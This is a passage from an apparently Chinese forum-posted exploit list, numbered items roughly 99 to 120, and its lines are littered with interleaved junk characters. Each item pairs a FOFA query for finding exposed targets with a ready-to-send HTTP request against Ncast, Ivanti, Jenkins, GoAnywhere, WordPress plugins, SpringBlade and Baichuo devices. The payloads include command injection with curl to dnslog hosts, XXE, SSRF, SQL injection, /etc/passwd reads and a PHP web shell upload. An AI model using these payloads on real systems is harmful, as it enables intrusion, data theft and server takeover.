FOFA:app="Ncast-产品" && title=="高清智能录播系统"
" m! {/ Q j9 C* B. SPOST /classes/common/busiFacade.php HTTP/1.1
- L* f' J$ d2 SHost: 192.168.40.130:8080
8 \# M( e& \8 @* OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.04 c- D+ G' f0 E- ?9 {0 V
Connection: close
8 c- S/ H$ F- W& l% w' |Content-Length: 154( R n# ?9 U, R$ }
Accept: */*1 B4 i" y0 p0 L+ Z
Accept-Encoding: gzip, deflate I& f- {# r& ]8 u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: W0 r6 P. f6 J& P% L4 p# ]1 @6 kContent-Type: application/x-www-form-urlencoded; charset=UTF-8; x+ U0 v# [; o \6 B5 R: j: `$ l
X-Requested-With: XMLHttpRequest
/ ^: X1 @- H5 f) I5 x3 [) o% o/ R. |( a( f2 G" ~5 m+ v/ G
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
. _2 j% w( p/ N! u, {
) S8 v% C; E0 n) J0 u( P3 W) v6 m) M. L. p
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传6 I7 _( Y7 \9 g: k) m
CVE-2024-0352
e, v2 n9 U$ jFOFA:icon_hash="874152924"3 ~& s2 { I- T# f
POST /api/file/formimage HTTP/1.1
( L, V$ `; ^1 p# h0 U& Q% d. IHost: 192.168.40.130 c( A" g4 D6 |' X+ y- i* p8 T
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
: V8 d8 o6 b1 IConnection: close
& W- S& U% [9 f1 YContent-Length: 201
/ Y- h O5 j, q6 qContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
" E! H4 O; f' M5 rAccept-Encoding: gzip
; A+ [) u0 S" I5 ?' o8 X9 [/ E4 X1 O3 R* A
------WebKitFormBoundarygcflwtei/ |3 s& r1 N0 t: v* A& C3 A
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
. \5 K( k# i; c0 _8 PContent-Type: application/x-php( B- l7 n3 d7 N* u! g
' J" W8 E4 u5 Y# t& g
2ayyhRXiAsKXL8olvF5s4qqyI2O1 z+ w. t# u* i1 j2 t( \; i
------WebKitFormBoundarygcflwtei--; X3 m. }8 m% I+ ~. v; h5 F
5 ^. A4 [0 ?0 {; u3 A' t
" k9 W4 C4 L3 P$ u9 q6 L- G101. ivanti policy secure-22.6命令注入
+ d- `. q- T5 _4 e7 ZCVE-2024-218875 e( M$ _2 F& G1 u8 H' F% W- [' d
FOFA:body="welcome.cgi?p=logo"9 U) t# p2 w6 f' R2 A' }" ^. O
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1: d/ i; d/ Y) ?5 U# t$ b8 {$ }
Host: x.x.x.xx.x.x.x
" C3 P7 V( y5 {6 I% b PUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36; O8 l" y$ j9 b( U& @ R
Connection: close+ ^. T1 d) v+ Y# S
Accept-Encoding: gzip
. ~: E1 x# L; L) s" F, p* z& M5 J7 V$ b* S' y" V
" u: ?' E; e- u0 h
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行2 g# ^4 s/ b* m0 q" j
CVE-2024-21893
" t2 E6 |% c* V4 x' O: CFOFA:body="welcome.cgi?p=logo"
8 ~. g5 `' S( [; D9 J8 w) ePOST /dana-ws/saml20.ws HTTP/1.19 `/ r2 N; t; f
Host: x.x.x.x
- D+ a) T& i' _0 x. iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36; O% k6 a" l1 [7 ?9 \* W
Connection: close
' h6 F( A/ D3 X6 EContent-Length: 792
9 b+ Z8 H T6 W; }2 JAccept-Encoding: gzip
, [# V0 `5 P' R* K
$ G6 r5 H5 n& |5 y<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
$ J7 i* }1 T) |4 y1 {: y
% D1 l9 J, \1 B103. Ivanti Pulse Connect Secure VPN XXE! v6 D) Z) b- p; h* L
CVE-2024-220242 `8 \1 ~3 J+ E. s3 M
FOFA:body="welcome.cgi?p=logo"
, A$ ?/ T! e2 l) ^POST /dana-na/auth/saml-sso.cgi HTTP/1.1
3 K7 {7 R d5 C0 x, }! MHost: 192.168.40.130:111
# T& u0 O) N* a" p. w L3 d/ b* \User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
; i. ^+ z3 h+ l0 m! NConnection: close
6 d4 N7 G7 I0 M* m( p* h- A! V8 a9 n! YContent-Length: 204* a% Y/ I% I5 M1 M; |3 k% ?6 {; x
Content-Type: application/x-www-form-urlencoded4 |, c+ g8 c5 g* k8 }
Accept-Encoding: gzip
2 G% c G L. v" n% q1 B3 r) g2 b- C) M& z3 W+ W- @
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
3 {8 V3 D9 G% P9 U) h2 N7 z! ] ]) q' M7 H' V* M! Q
1 a; y+ u/ Q3 x+ I$ x: C2 V
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
$ u! P! C, Q% c% i, {7 ]4 a<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>* j: v9 P7 U# u7 W6 Y' ~
! Q# y9 n( \6 p2 C6 `% x7 S2 _1 ^6 j4 r% ] ?) v" g
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露. o; K) t; P. K# t4 y
CVE-2024-0569
7 Q8 | d8 f! v1 WFOFA:title="TOTOLINK"
/ I! ?! _( X7 [. CPOST /cgi-bin/cstecgi.cgi HTTP/1.1% k1 t2 S# d+ Y0 k* w3 A
Host:192.168.0.1( b9 ?# ~/ e4 e( j
Content-Length:41; j& j1 |; {; a3 @
Accept:application/json,text/javascript,*/*;q=0.01% h" r" M; J# k
X-Requested-with: XMLHttpRequest
* Z3 L3 v6 M. g% N: U# J- N& F5 aUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36) W* }) k8 S B
Content-Type: application/x-www-form-urlencoded:charset=UTF-87 b0 ?- Z7 x0 s/ f }: {
Origin: http://192.168.0.1
5 w. x! f! |, n" J' T! nReferer: http://192.168.0.1/advance/index.html?time=16711523805641 u* j9 V& z. E" K$ M+ r; p
Accept-Encoding:gzip,deflate G& u! s+ ]4 T2 K, `/ \" h
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
) E! [: J+ `+ `/ O5 BConnection:close
7 j* u5 l6 P; _: h2 }8 K, C. l$ Z, q% d }% p
{
, w+ R& f& Q8 B3 b"topicurl":"getSysStatusCfg",- Z+ y3 s8 Q8 T4 p" y$ a
"token":""
! R+ H/ Q! L: B}
" ^' X. k5 U3 p4 D3 A' f# v" T
! _: l6 F+ A( h4 [) w' W; v105. SpringBlade v3.2.0 export-user SQL 注入. b, m, C) S2 X3 @% h
FOFA:body="https://bladex.vip") Z7 J" {4 X6 m( B. v
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
$ \& a! [% C- A# L% z& v
3 c e1 m$ f7 @. [+ K- i; r106. SpringBlade dict-biz/list SQL 注入7 j7 z) N. ~ F. y( M
FOFA:body="Saber 将不能正常工作"
# b* F. \1 c; B/ GGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.14 S( z% K! ? a+ M
Host: your-ip
9 |- N9 S. E# l( {. rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 `8 s# |* @1 r' A, a# q; L
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A' D" b; {; E% N8 m
Accept-Encoding: gzip, deflate
- N8 k$ }- Z. g9 z" DAccept-Language: zh-CN,zh;q=0.9! s( w5 l% F+ h8 t8 c
Connection: close: K3 B/ v2 Y5 g
" H5 I# ^& v# N7 M6 _) R$ }6 d0 m" M# |. `
107. SpringBlade tenant/list SQL 注入) e9 Q' l6 O$ Y1 y }; K% j d
FOFA:body="https://bladex.vip"
/ m9 Q1 Z* H) h& A" |; JGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1* Z8 R3 T. B9 y
Host: your-ip
7 P2 Q% Q9 u8 ~8 V; _* eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 Z/ d) B" ]% FBlade-Auth:替换为自己的
% G- l0 L* e9 b8 Q* [8 {; R" NConnection: close* T w8 M/ T8 t
+ a7 @) i: k# O, f; \5 o7 q0 e1 o6 j" v: W
108. D-Tale 3.9.0 SSRF& {4 f9 ]1 ]3 I1 f
CVE-2024-21642
( D1 X" K9 \/ w( P1 EFOFA:"dtale/static/images/favicon.png"
* s; I( j7 o) CGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.13 w+ F# M( M8 m4 e" o# S. C6 {
Host: your-ip
2 h0 h4 d* f; tAccept: application/json, text/plain, */*
7 x3 T: q! r1 R& i) @+ _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
1 ^! k$ q- l+ k9 M9 _& [Accept-Encoding: gzip, deflate3 ?1 P w9 g: T& y1 ]4 R) y
Accept-Language: zh-CN,zh;q=0.9,en;q=0.84 B g1 V) }' \$ D; _6 v# a
Connection: close+ U% Y1 m9 n3 X
' s. U: k7 Z/ E$ a0 u
; d9 o' j( I* \$ p; e109. Jenkins CLI 任意文件读取9 \2 t5 ~; |: T+ Q, B9 \( D
CVE-2024-23897
/ s( g3 p d* G, _+ ?5 [9 y' Z* ^8 mFOFA:header="X-Jenkins"
' R& k! ?9 l; {! H! @ t6 ~. NPOST /cli?remoting=false HTTP/1.1
M/ U" i9 O, @% }$ @, k$ G7 R$ RHost:# y9 S7 A; ]% Q' {) C
Content-type: application/octet-stream# P9 ?/ ^) W+ S% d" J( @& r
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92 j4 J$ z6 K! u0 b z& ?: J
Side: upload2 f: t% d+ T1 u1 j0 o4 I9 Y% y: a
Connection: keep-alive1 C) B7 z3 a6 z; K# O+ r
Content-Length: 163
' W. w# d% c0 Y3 n/ i9 G7 _6 L* [3 r7 t& ?7 N- S2 f& m
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'0 ^0 E. y, M$ u! k- j. Y& c
' t/ {+ C& G$ w. c( O' W6 s' F) E3 j* L4 l6 E! A
POST /cli?remoting=false HTTP/1.13 o ^3 K" r T. l
Host:
- ?+ ^7 ?2 i2 A; _Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
( G @( Z Y3 M' `download6 g3 w( [) d1 f9 B
Content-Type: application/x-www-form-urlencoded# Z$ H0 a9 r. |
Content-Length: 0, u* N( f: O. l- Z. d, E
: ]- D/ Q6 @# m( C8 u
. y$ D, K) P! n5 Y% w6 f! d
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
6 b3 {/ }4 m6 z/ S# hjava -jar jenkins-cli.jar help
/ A) k" A, ^) X2 S[COMMAND]
7 ~( f* v9 \- ~Lists all the available commands or a detailed description of single command.
* j* E2 A2 `! W& A COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
1 u4 R3 l1 Q' j4 q/ S
' R6 s0 G6 G. X- a r& w
' I- m6 d9 E4 B9 T, ]110. Goanywhere MFT 未授权创建管理员
% R( z, \6 \/ a) jCVE-2024-0204; I+ z1 x Y4 G- J3 @( \: m
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
7 a4 I, i0 H5 ~2 n4 `* o3 eGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
+ ?9 q% K& X4 |Host: 192.168.40.130:8000
$ e: i# G5 K. w2 E, ~User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.360 {5 k& q0 D* U+ i: K4 S! ~% _; [
Connection: close" P4 P9 l. O4 J& w5 }
Accept: */*/ z- {8 p% _- F" }, r) p
Accept-Language: en" ]8 h2 p9 P2 V0 @
Accept-Encoding: gzip
! ]) ?9 ^; n4 w3 ~7 V, w/ D0 o+ ?
5 C6 S1 u k. c; _2 C) \. h8 |. Z w# J
111. WordPress Plugin HTML5 Video Player SQL注入' c O: [$ \& e' f* D$ |1 e+ B
CVE-2024-1061
6 L4 U2 e. z. m( |FOFA:"wordpress" && body="html5-video-player"7 N, \7 z; b1 v7 G
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
% j- I1 A1 Y# y# {( mHost: 192.168.40.130:112( ~/ Y: |+ Y! M' a, y
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.368 F3 S8 |- Z" t" l# ~5 |& O: A
Connection: close! p. ]% I0 D% E& H7 X
Accept: */*
+ G- Y3 y' w) B8 p% }7 vAccept-Language: en
* @# L- ?" w/ j: RAccept-Encoding: gzip; h) Q0 X7 G- O7 O
- v$ c8 d8 V! |3 x0 H7 K* K" T
' a/ P6 @2 C: ^; h112. WordPress Plugin NotificationX SQL 注入6 y& g1 i* h# o/ i3 A, X
CVE-2024-1698
9 b) U- D& D9 h: j- ^FOFA:body="/wp-content/plugins/notificationx"
3 m+ ]* S2 \, i1 a, H; {, t, lPOST /wp-json/notificationx/v1/analytics HTTP/1.1
0 r; K) j+ k5 Q+ y3 kHost: {{Hostname}}7 c% k# l2 x" I; {, |# e
Content-Type: application/json# Z, u, B. b& j! D: L
* P- I" [- _; V6 P
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
" X" |0 m r, U5 x) y6 s, m0 ~+ Z5 ?8 X/ i1 W8 M, _8 h$ ?
. m. H. E) I; C* r1 ]
113. WordPress Automatic 插件任意文件下载和SSRF, G" R7 X$ K- M* Y" F# |
CVE-2024-27954
+ A2 |! m2 O; {) j$ T" L, fFOFA:"/wp-content/plugins/wp-automatic"
& u9 T3 `/ M$ T' G* eGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1! b0 f# @7 |2 _0 h0 h4 d8 s* `
Host: x.x.x.x
& O% [* D. F1 lUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.360 G$ O' S6 S+ a4 d
Connection: close
* x, K+ Z" g( X( S8 g: @9 TAccept: */*
' z, z; o- S) \Accept-Language: en
p( x, \7 ^/ E+ OAccept-Encoding: gzip
# |/ W8 M- n+ O+ w# N$ a; `) C. S3 G7 g" \: a5 a9 O
: q" f2 i {+ }5 O8 b3 W. U114. WordPress MasterStudy LMS插件 SQL注入
; K; [5 @$ J8 t' n5 M3 xFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
' s1 c5 c! M6 o. q$ x8 |+ N/ fGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
0 R. B9 h! d; L4 z1 JHost: your-ip
- S& |# N; `* ~( M4 p; j4 a' m5 ZUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
( X& C. x/ G l" m2 ?% v* TAccept-Charset: utf-8
/ ?7 e0 @2 [$ r1 Y& ~* O7 }$ }Accept-Encoding: gzip, deflate
: z% ]3 q' P* T7 NConnection: close9 g; H9 y+ b+ [4 y
4 B* x. Z+ _$ w, U! z, ]; p) n
6 A' H5 V: ?4 A& x9 F115. WordPress Bricks Builder <= 1.9.6 RCE; N2 Z; w3 T1 E' }
CVE-2024-25600
; l/ a5 n7 j, @8 }# e; g" NFOFA: body="/wp-content/themes/bricks/"
; {; q& `" W+ {4 w, v第一步,获取网站的nonce值
% y/ }2 i" Z% C5 x) i( t, e" kGET / HTTP/1.1
! R/ i- s2 z; Y) Q; Q, PHost: x.x.x.x' S* l$ k4 D! Z* y6 f2 ]8 y' n
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36+ T5 j$ l& L3 d
Connection: close. E: t. b8 I/ X# M
Accept-Encoding: gzip
- j& b) w" x+ U
* h! j( v' D3 V0 k: E& h/ Z) ]) S" y( l6 _' r
第二步替换nonce值,执行命令
! E+ A! [- g/ Y) [ oPOST /wp-json/bricks/v1/render_element HTTP/1.1
6 J- M" {/ l/ r% A/ W& OHost: x.x.x.x& ^) X6 P: Z9 ?3 e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.366 h9 K: n3 X; e9 i: T
Connection: close+ a- y5 q; m7 \; G- H# D# o
Content-Length: 356# z! C0 r& C$ r. L% N; U: S. @8 M+ P
Content-Type: application/json7 |, ^% l8 v; s J; L& z
Accept-Encoding: gzip
! A$ l! i3 [. ~0 Q9 s/ C+ J2 ~2 Z- e1 `& e* V' i( a
{5 Y* {+ M$ S5 T+ h( O& a% f" Y
"postId": "1",9 L& q# t% {9 M; }9 P2 O8 [8 P
"nonce": "第一步获得的值",
; l8 w- P& |! w. l6 O$ k) P "element": {, g$ `# Q; ^, y: h3 E7 G
"name": "container",& r7 ?4 B6 Y$ r; Z0 N
"settings": {$ v; X7 R- G: e0 B: b) e0 j4 M
"hasLoop": "true",
0 s1 e1 O1 q3 a+ Y% p9 v5 Z1 v "query": {" p/ K M( u( ^: S7 X/ E
"useQueryEditor": true,! C, R) \6 s3 C, A, r S* l& T& v
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
5 y6 P9 b4 `! `7 a. u "objectType": "post"
& X( d0 ^- X s }
& }+ t' a# n- f6 g K }, O% t- l% e5 L/ F8 ?
}
, Z3 J7 N: O5 k# }/ m8 `) D}
4 q" ~$ Y+ W8 l& _: x: x; L: y
6 ^" w/ y( S4 [; b. Z
9 I" R6 R! z! s" X116. wordpress js-support-ticket文件上传. w5 S' o; j8 \. E
FOFA:body="wp-content/plugins/js-support-ticket"
0 E( V5 @4 u( _1 B7 R% x9 KPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
: I+ L% _7 o8 M# C9 q; qHost:# D& d- k2 m: ^) r2 M) [
Content-Type: multipart/form-data; boundary=--------7670991719 A! Z7 O( ~& j: P) ^& W
User-Agent: Mozilla/5.0
3 y, W, O# v+ r
. L, t) d4 v4 ~4 C! Y4 j----------767099171
# B: o; k& a* FContent-Disposition: form-data; name="action"6 G7 V4 k3 {+ |* B& {7 J
configuration_saveconfiguration n9 L x6 f( h- E i
----------767099171: X- e6 m" P5 s1 t( v3 E1 W) Q
Content-Disposition: form-data; name="form_request") l" a+ _& I# N, _4 k
jssupportticket
4 f3 z1 e# L( }! ?----------767099171
- ], n% q% [0 T6 o6 lContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"" X5 j, C/ X& A7 m% @$ B K# K1 d
Content-Type: image/png( D6 l" @- p/ `9 k" V% g/ a9 \
----------767099171--
; F% B2 O; M* o* z/ _6 ?# ^" P- O7 g9 D6 t# c
# e' O$ q/ G: k
117. WordPress LayerSlider插件SQL注入- u4 V" L' e& P/ a# V9 E! u
version:7.9.11 – 7.10.0* M& P5 ~; s7 ~& S
FOFA:body="/wp-content/plugins/LayerSlider/"
1 V6 G- l1 T' EGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1: ~ p& d* w; {% h8 Z" S
Host: your-ip7 U+ P+ {0 R- M0 A& B2 j4 o2 H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.01 ^' N, K9 a. w5 ?2 N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 w- c9 X) z- i: x6 G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 \: n' a* \ [" O# e: ~' Q: SAccept-Encoding: gzip, deflate, br5 }- a, @ P7 ^9 L3 S2 c1 s; V
Connection: close9 P* ^7 v C5 X. W. i
Upgrade-Insecure-Requests: 1, M/ S( u3 H4 m7 Y( r. F. E
! V" {% b, F' n1 L/ Q0 v6 D2 }* ?0 u
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
) h' G. u& m0 h/ v0 mCVE-2024-09393 N0 ^$ D7 Z( {
FOFA:title="Smart管理平台". s* t1 `- e- P0 S. `7 \6 p2 n
POST /Tool/uploadfile.php? HTTP/1.16 e% a) @+ k$ A4 s
Host: 192.168.40.130:84437 @6 ^( H, `4 g
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
3 L1 n% f! }9 l( KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
- L' s) `. B* v0 OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& J! e" p7 S* K: A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! g* a0 t% q6 T/ Q( J C# oAccept-Encoding: gzip, deflate- J3 U+ ^, R, u. u& i; K
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
2 |- \" E$ z0 ^# F' X4 z+ IContent-Length: 405
/ a. D: l9 ]/ v. w5 f1 DOrigin: https://192.168.40.130:8443# S2 F0 Y. Z* c" @
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
, C2 H7 I6 Q! f. \/ U* w) GUpgrade-Insecure-Requests: 1
5 l& m: P( z" K4 p9 RSec-Fetch-Dest: document
6 X3 X% O3 q' s! f, @+ V& aSec-Fetch-Mode: navigate
$ ]6 |" N5 U! M* T+ WSec-Fetch-Site: same-origin$ e% d' d. K! l8 p& O
Sec-Fetch-User: ?1
6 ~; G1 m% E4 F4 I+ D# e6 A6 B" aTe: trailers
8 ]& v' w( N/ L+ v0 ~- T) `Connection: close
4 I# t- Y ^1 B9 ?7 W% d. }" \
4 y$ `4 [* k- C-----------------------------13979701222747646634037182887
2 H. A- a0 d" P* M# `8 l! fContent-Disposition: form-data; name="file_upload"; filename="contents.php"
9 O% x( z3 y8 G+ f% sContent-Type: application/octet-stream' F' A8 R8 _+ h, X+ H
* c1 \3 }2 v3 D<?php
5 @3 h, G. o: N0 Wsystem($_POST["passwd"]);
! Z8 B) c+ D% p0 \?>
' y' ~& R- o+ V: G H/ a-----------------------------13979701222747646634037182887
! M! g$ M# Y1 h: lContent-Disposition: form-data; name="txt_path"
' ?$ r5 S8 K) u& X$ p8 |8 `# Q" d. K1 K5 j, ^/ S
/home/src.php
" x8 {3 B( J6 @) b0 ^3 W-----------------------------13979701222747646634037182887--
: o9 I7 S0 }2 j: X9 |+ B$ {6 ~% N' E1 E
( A4 T% l1 c6 U4 v0 y6 c访问/home/src.php0 G8 z8 i8 y$ O
" t- Y+ q9 P8 ]& A1 E8 c
119. 北京百绰智能S20后台sysmanageajax.php sql注入- G& F$ h0 P/ C9 g* Q# D5 p/ g- X
CVE-2024-1254
5 T' z9 B+ q+ T+ ^: gFOFA:title="Smart管理平台"
! K% p5 i( z! A! ~0 C先登录进入系统,默认账号密码为admin/admin3 [8 Y# e9 B& c, e6 H
POST /sysmanage/sysmanageajax.php HTTP/1.111 A2 v( r7 T" o
Host: x.x.x.x2 n% _) l' S3 g) }, m [8 h
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
( ^9 \9 Q: n( D% oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
/ Y4 ?! s8 N' ] {Accept: */*+ d4 L' p$ O, u+ v( i
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- b3 u/ x( V$ h1 \Accept-Encoding: gzip, deflate
; U! A3 ^/ ]# e4 _5 l2 b& Q% \Content-Type: application/x-www-form-urlencoded;* y, l% `. M' T' [4 B
Content-Length: 109
: p( f! ~2 X6 ROrigin: https://58.18.133.60:8443
- `. ~8 P) C) `9 [Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
% S" t' K c+ @0 n( x% ] p5 |Sec-Fetch-Dest: empty
: {" Y0 d/ I, E1 _. i4 F8 LSec-Fetch-Mode: cors) G6 J r3 ~ s$ w' R
Sec-Fetch-Site: same-origin
4 k: Y4 c' U" j, s6 oX-Forwarded-For: 1.1.1.1' D8 N9 N; p$ z2 O
X-Originating-Ip: 1.1.1.1$ t3 S6 V) K1 k- J P) A
X-Remote-Ip: 1.1.1.1
, S9 ]* _) [0 N% l0 R0 x/ n6 WX-Remote-Addr: 1.1.1.1
4 M: b- E7 m; Z( g7 J4 S" z" p. RTe: trailers0 C( i5 ?, H+ k1 ?3 ?+ L$ O6 X
Connection: close
2 P `$ M9 m$ C- ]6 r: `; B! D9 Q
3 v& q8 w) Y6 Wsrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
: f8 C: H% v* e6 N' f, ^8 |3 N1 s0 l- Y. {5 S2 l/ c* j
3 _4 E6 l' ^3 M4 O) I- Q6 W# p
120. 北京百绰智能S40管理平台导入web.php任意文件上传
$ R' ^, V+ u5 E' r) x# S& TCVE-2024-1253
9 H6 \: c8 O1 x7 |2 h: Z: D {9 U! ]FOFA:title="Smart管理平台"# ^- \; E% p ]9 X+ }/ M/ w' K$ H b
POST /useratte/web.php? HTTP/1.1
- l1 V, e* X5 H) iHost: ip:port
8 g+ |" g9 a- h. CCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db8 _4 T( e- E. u: [/ z3 e* X
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko0 u2 G' \5 o1 o% A$ ]) |* [; {
